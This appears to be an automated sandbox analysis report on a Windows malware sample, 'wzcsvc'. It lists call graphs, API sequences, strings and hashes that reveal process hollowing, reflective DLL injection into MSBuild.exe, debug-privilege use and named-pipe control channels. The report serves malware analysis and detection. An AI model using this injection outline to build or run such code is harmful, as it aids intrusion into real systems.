8550 7ff6b5ad26fc 8546->8550 8546->8559 8551 7ff6b5ad26b5 ExitProcess 8547->8551 8552 7ff6b5ad259d 8547->8552 8553 7ff6b5ad1754 22 API calls 8548->8553 8554 7ff6b5ad2754 8549->8554 8555 7ff6b5ad2911 8549->8555 8550->8559 8564 7ff6b5ad10c0 30 API calls 8550->8564 8557 7ff6b5ad25a6 8552->8557 8558 7ff6b5ad2658 RegOpenKeyExW 8552->8558 8553->8559 8560 7ff6b5ad2795 8554->8560 8561 7ff6b5ad2759 8554->8561 8563 7ff6b5ad193c ReadFile 8555->8563 8556->8559 8562 7ff6b5ad18a4 3 API calls 8556->8562 8557->8559 8571 7ff6b5ad25c3 ReadFile 8557->8571 8565 7ff6b5ad2685 RegDeleteValueW 8558->8565 8566 7ff6b5ad2699 8558->8566 8627 7ff6b5ad193c 8560->8627 8561->8559 8624 7ff6b5ad2174 8561->8624 8568 7ff6b5ad29bf 8562->8568 8570 7ff6b5ad2920 8563->8570 8564->8550 8565->8566 8611 7ff6b5ad19bc SysAllocString SysAllocString CoInitializeEx 8566->8611 8568->8559 8578 7ff6b5ad29d3 GetProcessHeap HeapAlloc 8568->8578 8579 7ff6b5ad2630 8568->8579 8570->8559 8581 7ff6b5ad193c ReadFile 8570->8581 8571->8559 8575 7ff6b5ad25ed 8571->8575 8572 7ff6b5ad269e 8619 7ff6b5ad1754 GetProcessHeap HeapAlloc 8572->8619 8575->8559 8588 7ff6b5ad18a4 3 API calls 8575->8588 8585 7ff6b5ad14d0 13 API calls 8578->8585 8591 7ff6b5ad2a88 4 API calls 8579->8591 8580 7ff6b5ad27ac ReadFile 8580->8559 8586 7ff6b5ad27d4 8580->8586 8582 7ff6b5ad2937 8581->8582 8582->8559 8587 7ff6b5ad293f ShellExecuteW 8582->8587 8600 7ff6b5ad2a0c 8585->8600 8586->8559 8592 7ff6b5ad27e1 GetProcessHeap HeapAlloc ReadFile 8586->8592 8587->8559 8595 7ff6b5ad260c 8588->8595 8591->8559 8593 7ff6b5ad2903 GetProcessHeap 8592->8593 8594 7ff6b5ad2825 8592->8594 8598 7ff6b5ad2a4a HeapFree 8593->8598 8594->8593 8603 7ff6b5ad2856 8594->8603 8604 7ff6b5ad2879 lstrlenW GetProcessHeap HeapAlloc 8594->8604 8595->8559 8595->8579 8601 7ff6b5ad261c 8595->8601 8597 7ff6b5ad2a41 GetProcessHeap 8597->8598 8598->8559 8600->8597 8602 7ff6b5ad2a3a 8600->8602 8651 7ff6b5ad16c4 8600->8651 8605 7ff6b5ad10c0 30 API calls 8601->8605 8602->8597 8603->8593 8631 7ff6b5ad1c80 8603->8631 8645 7ff6b5ad2a88 CreateFileW 8604->8645 8605->8559 8612 7ff6b5ad1b24 SysFreeString SysFreeString 8611->8612 8613 7ff6b5ad1a09 CoInitializeSecurity 8611->8613 8612->8572 8614 7ff6b5ad1a45 8613->8614 8615 7ff6b5ad1a51 CoCreateInstance 8613->8615 8614->8615 8616 7ff6b5ad1b1e CoUninitialize 8614->8616 8615->8616 8617 7ff6b5ad1a80 VariantInit 8615->8617 8616->8612 8618 7ff6b5ad1ad6 8617->8618 8618->8616 8620 7ff6b5ad14d0 13 API calls 8619->8620 8622 7ff6b5ad1792 8620->8622 8621 7ff6b5ad17c0 GetProcessHeap HeapFree 8622->8621 8623 7ff6b5ad16c4 5 API calls 8622->8623 8623->8622 8625 7ff6b5ad190c 2 API calls 8624->8625 8626 7ff6b5ad2189 8625->8626 8628 7ff6b5ad1960 ReadFile 8627->8628 8629 7ff6b5ad1983 8628->8629 8630 7ff6b5ad199d 8628->8630 8629->8628 8629->8630 8630->8559 8630->8580 8637 7ff6b5ad1cb3 8631->8637 8632 7ff6b5ad1cc6 CreateProcessW 8633 7ff6b5ad1d23 VirtualAllocEx 8632->8633 8632->8637 8635 7ff6b5ad1d58 WriteProcessMemory 8633->8635 8633->8637 8634 7ff6b5ad1e8f 8634->8593 8635->8637 8636 7ff6b5ad1e5a OpenProcess 8636->8637 8638 7ff6b5ad1e70 TerminateProcess 8636->8638 8637->8632 8637->8634 8637->8636 8639 7ff6b5ad1dca VirtualAlloc 8637->8639 8640 7ff6b5ad1d84 WriteProcessMemory 8637->8640 8638->8637 8639->8637 8641 7ff6b5ad1de9 GetThreadContext 8639->8641 8640->8637 8641->8637 8642 7ff6b5ad1e01 WriteProcessMemory 8641->8642 8642->8637 8643 7ff6b5ad1e28 SetThreadContext 8642->8643 8643->8637 8644 7ff6b5ad1e46 ResumeThread 8643->8644 8644->8634 8644->8637 8646 7ff6b5ad2ad2 WriteFile 8645->8646 8647 7ff6b5ad28ef GetProcessHeap HeapFree 8645->8647 8648 7ff6b5ad2b14 CloseHandle 8646->8648 8649 7ff6b5ad2af6 8646->8649 8647->8593 8648->8647 8649->8648 8650 7ff6b5ad2afa WriteFile 8649->8650 8650->8648 8652 7ff6b5ad16e3 OpenProcess 8651->8652 8653 7ff6b5ad173d 8651->8653 8652->8653 8654 7ff6b5ad16fb 8652->8654 8653->8597 8655 7ff6b5ad2114 2 API calls 8654->8655 8657 7ff6b5ad171b 8655->8657 8656 7ff6b5ad1734 CloseHandle 8656->8653 8657->8656 8658 7ff6b5ad1729 CloseHandle 8657->8658 8658->8656

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FF6B5AD2264 Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                                                                                                                                                                                                • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\wzconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                                                                                                                                                                                • API String ID: 4177739653-225948716
                                                                                                                                                                                                                                                • Opcode ID: 50ba8c157a93ef939d036fd2e1ae7c9574a30eb4664e9a0a25ba6ae7d48a92ab
                                                                                                                                                                                                                                                • Instruction ID: 9f2b41784d5fc8fdb8141fbfe7dcd30bc1f78b4c8051d6e5ceb592e0f520f59d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50ba8c157a93ef939d036fd2e1ae7c9574a30eb4664e9a0a25ba6ae7d48a92ab
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06815075A48B0296EB20BF29E8545E973A1FF88F58B444136DF4E93AA9DF3CD944C700
                                                                                                                                                                                                                                                Function 00007FF6B5AD10C0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 255memorystringnativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 24 7ff6b5ad10c0-7ff6b5ad1110 call 7ff6b5ad18a4 27 7ff6b5ad14b3-7ff6b5ad14cf 24->27 28 7ff6b5ad1116-7ff6b5ad111c 24->28 28->27 29 7ff6b5ad1122-7ff6b5ad1138 OpenProcess 28->29 29->27 30 7ff6b5ad113e-7ff6b5ad115b OpenProcess 29->30 31 7ff6b5ad1161-7ff6b5ad1179 K32GetModuleFileNameExW 30->31 32 7ff6b5ad11f6-7ff6b5ad1217 NtQueryInformationProcess 30->32 33 7ff6b5ad117b-7ff6b5ad1197 PathFindFileNameW lstrlenW 31->33 34 7ff6b5ad11ac-7ff6b5ad11b8 CloseHandle 31->34 35 7ff6b5ad14aa-7ff6b5ad14ad CloseHandle 32->35 36 7ff6b5ad121d-7ff6b5ad1223 32->36 33->34 37 7ff6b5ad1199-7ff6b5ad11a9 StrCpyW 33->37 34->32 38 7ff6b5ad11ba-7ff6b5ad11cb 34->38 35->27 36->35 39 7ff6b5ad1229-7ff6b5ad1241 OpenProcessToken 36->39 37->34 40 7ff6b5ad11d2-7ff6b5ad11e4 StrCmpIW 38->40 39->35 41 7ff6b5ad1247-7ff6b5ad126d GetTokenInformation 39->41 40->35 42 7ff6b5ad11ea-7ff6b5ad11f4 40->42 43 7ff6b5ad126f-7ff6b5ad1278 GetLastError 41->43 44 7ff6b5ad12ea 41->44 42->32 42->40 43->44 46 7ff6b5ad127a-7ff6b5ad128e LocalAlloc 43->46 45 7ff6b5ad12f1-7ff6b5ad12ff CloseHandle 44->45 45->35 47 7ff6b5ad1305-7ff6b5ad130c 45->47 46->44 48 7ff6b5ad1290-7ff6b5ad12b6 GetTokenInformation 46->48 47->35 49 7ff6b5ad1312-7ff6b5ad131d 47->49 50 7ff6b5ad12d8 48->50 51 7ff6b5ad12b8-7ff6b5ad12d6 GetSidSubAuthorityCount GetSidSubAuthority 48->51 49->35 53 7ff6b5ad1323-7ff6b5ad132d 49->53 52 7ff6b5ad12df-7ff6b5ad12e8 LocalFree 50->52 51->52 52->45 53->35 54 7ff6b5ad1333-7ff6b5ad133d 53->54 54->35 55 7ff6b5ad1343-7ff6b5ad1383 call 7ff6b5ad1ebc * 3 54->55 55->35 62 7ff6b5ad1389-7ff6b5ad13a9 call 7ff6b5ad1ebc StrStrA 55->62 65 7ff6b5ad13c1-7ff6b5ad13e6 call 7ff6b5ad1ebc * 2 62->65 66 7ff6b5ad13ab-7ff6b5ad13ba 62->66 65->35 72 7ff6b5ad13ec-7ff6b5ad1413 VirtualAllocEx 65->72 66->62 67 7ff6b5ad13bc 66->67 67->35 72->35 73 7ff6b5ad1419-7ff6b5ad1432 WriteProcessMemory 72->73 73->35 74 7ff6b5ad1434-7ff6b5ad1456 call 7ff6b5ad2114 73->74 74->35 77 7ff6b5ad1458-7ff6b5ad1460 74->77 77->35 78 7ff6b5ad1462-7ff6b5ad1468 77->78 79 7ff6b5ad1471-7ff6b5ad147e WaitForSingleObject 78->79 80 7ff6b5ad146a-7ff6b5ad146f 78->80 82 7ff6b5ad149f 79->82 83 7ff6b5ad1480-7ff6b5ad1494 GetExitCodeThread 79->83 81 7ff6b5ad14a4 CloseHandle 80->81 81->35 82->81 83->82 84 7ff6b5ad1496-7ff6b5ad149c 83->84 84->82
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                                                                                                                                                                                • String ID: @$MSBuild.exe$ReflectiveDllMain
                                                                                                                                                                                                                                                • API String ID: 2561231171-627206108
                                                                                                                                                                                                                                                • Opcode ID: ab04de0f4ae730528dcd8ac1db4fb739fdc3cf093d46144e9515fcb488db511c
                                                                                                                                                                                                                                                • Instruction ID: ac1614ca0a6530748963b28d08358b34a4caf4a86ce48fed314a23093705e4ad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab04de0f4ae730528dcd8ac1db4fb739fdc3cf093d46144e9515fcb488db511c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0B153A5A4868286EB64AB1AD8542F92BA5FF84F84F004135DF0DA77D9DF3CEA45C700
                                                                                                                                                                                                                                                Function 00007FF6B5AD14D0 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4084875642-0
                                                                                                                                                                                                                                                • Opcode ID: 1f6e7ca111fffa28030183a820218c6321eee64b8bf9185de75928df8c46143d
                                                                                                                                                                                                                                                • Instruction ID: 9c8ef98461a36277e6b01ff81a0c8d9a780b9e21c85c87c3984411d09ee9beda
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f6e7ca111fffa28030183a820218c6321eee64b8bf9185de75928df8c46143d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C519E32B556829AEB60EF26E8586E927A0FF49F84F440035EF4DA7799DE3CD845C700
                                                                                                                                                                                                                                                Function 00007FF6B5AD1B4C Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3197395349-0
                                                                                                                                                                                                                                                • Opcode ID: 721aaf7103811f45df287b5c067dfe78fe8c91bb71f5cc795d6d2487480b1a5e
                                                                                                                                                                                                                                                • Instruction ID: b9bfb40371e7e9f19bacd695f39da6f9b92fe8ab174d2b9bfecdcfb9d9156b4f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 721aaf7103811f45df287b5c067dfe78fe8c91bb71f5cc795d6d2487480b1a5e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A315E326147968AD760DF28E4807DE7BA4FB48B58F40422AEF5D97E98DF38D508CB40
                                                                                                                                                                                                                                                Function 00007FF6B5AD1F24 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                                                                                                                                                                • String ID: .text$C:\Windows\System32\
                                                                                                                                                                                                                                                • API String ID: 2721474350-832442975
                                                                                                                                                                                                                                                • Opcode ID: 4ed13a8cb8106b11fba381a82c5365f0d7fbeed321106a12c86950f053f09732
                                                                                                                                                                                                                                                • Instruction ID: 08c89203d5d943233612e15f822990a50e851f8493d78775a9dd87db859330b2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ed13a8cb8106b11fba381a82c5365f0d7fbeed321106a12c86950f053f09732
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE51A322B0868296EB10AF19E4586AA73A1FF84F94F444136DF4E53B9DDF3CE949C700
                                                                                                                                                                                                                                                Function 00007FF6B5AD2BF0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                                                                                                                                                                • String ID: M$\\.\pipe\wzchildproc64
                                                                                                                                                                                                                                                • API String ID: 2203880229-1972328950
                                                                                                                                                                                                                                                • Opcode ID: 3b5b6ec81f1da2cc910c22c2008fe65f86985561381c9405c201595c762e9934
                                                                                                                                                                                                                                                • Instruction ID: c85396765384189edbd26f207fa5af9bf9dee7e7b7111a110832224e004c3659
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b5b6ec81f1da2cc910c22c2008fe65f86985561381c9405c201595c762e9934
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F113721A9C647A1E714FB15E4143F96760AF84FA0F444135DF5A926DADF7CED44C700
                                                                                                                                                                                                                                                Function 00007FF6B5AD21C8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                                                                                                                                                                • String ID: \\.\pipe\wzcontrol_redirect64
                                                                                                                                                                                                                                                • API String ID: 2071455217-2060006620
                                                                                                                                                                                                                                                • Opcode ID: 8c2d41e4b5917682c0d9b85a7d6b8c4e9ca0a7ce3b1635297fe8c4020b63dccb
                                                                                                                                                                                                                                                • Instruction ID: 66e4e9acf4c6f49f6853729f599cedff258678136cf29d6ca6669966eafcb8c3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c2d41e4b5917682c0d9b85a7d6b8c4e9ca0a7ce3b1635297fe8c4020b63dccb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59011631A8C543A1EA14BB19E4142F963A0AF55FA1F144135EF6A925EEDF7CEC44C700
                                                                                                                                                                                                                                                Function 00007FF6B5AD2B30 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3676546796-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7434d648b02f48f96685b3b4a90df6a8a4e973ed4e1a42b06417b92ab0b95
                                                                                                                                                                                                                                                • Instruction ID: fced5a88afedf239fa11b43f4e148db6b4be930db08991a08edd45ceec283361
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7434d648b02f48f96685b3b4a90df6a8a4e973ed4e1a42b06417b92ab0b95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38114F32A4865396EB14EF1AA81456A76A1FFC5F81F144034DF4A5779DCE7DEC40CB40
                                                                                                                                                                                                                                                Function 00007FF6B5AD17E4 Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,00000000,?,00007FF6B5AD2383,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD17F9
                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000000,?,00007FF6B5AD2383,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD180A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: GetProcessHeap.KERNEL32 ref: 00007FF6B5AD1503
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: HeapAlloc.KERNEL32 ref: 00007FF6B5AD1516
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: GetProcessHeap.KERNEL32 ref: 00007FF6B5AD1524
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: HeapAlloc.KERNEL32 ref: 00007FF6B5AD1535
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: K32EnumProcesses.KERNEL32 ref: 00007FF6B5AD154F
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: OpenProcess.KERNEL32 ref: 00007FF6B5AD157D
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: K32EnumProcessModules.KERNEL32 ref: 00007FF6B5AD15A2
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: ReadProcessMemory.KERNELBASE ref: 00007FF6B5AD15D9
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: CloseHandle.KERNELBASE ref: 00007FF6B5AD1615
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: GetProcessHeap.KERNEL32 ref: 00007FF6B5AD1627
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: RtlFreeHeap.NTDLL ref: 00007FF6B5AD1635
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: GetProcessHeap.KERNEL32 ref: 00007FF6B5AD163B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD14D0: RtlFreeHeap.NTDLL ref: 00007FF6B5AD1649
                                                                                                                                                                                                                                                • OpenProcess.KERNEL32 ref: 00007FF6B5AD1851
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32 ref: 00007FF6B5AD1864
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00007FF6B5AD186D
                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00007FF6B5AD187D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1323846700-0
                                                                                                                                                                                                                                                • Opcode ID: 5ed7fbe74340a9b931601102cc6c57433faa05d3f95bbe3169b19a4aead5adb9
                                                                                                                                                                                                                                                • Instruction ID: 9a90a15b90f905a3eb50bb42d687aa22cf474aef06f2b78246fb3e4c510e0f4d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ed7fbe74340a9b931601102cc6c57433faa05d3f95bbe3169b19a4aead5adb9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34113021F4964385EB14FB5AA4041AD6BE1AF89F84F184035EF0D937AADE3CD845C700
                                                                                                                                                                                                                                                Function 00007FF6B5AD18A4 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
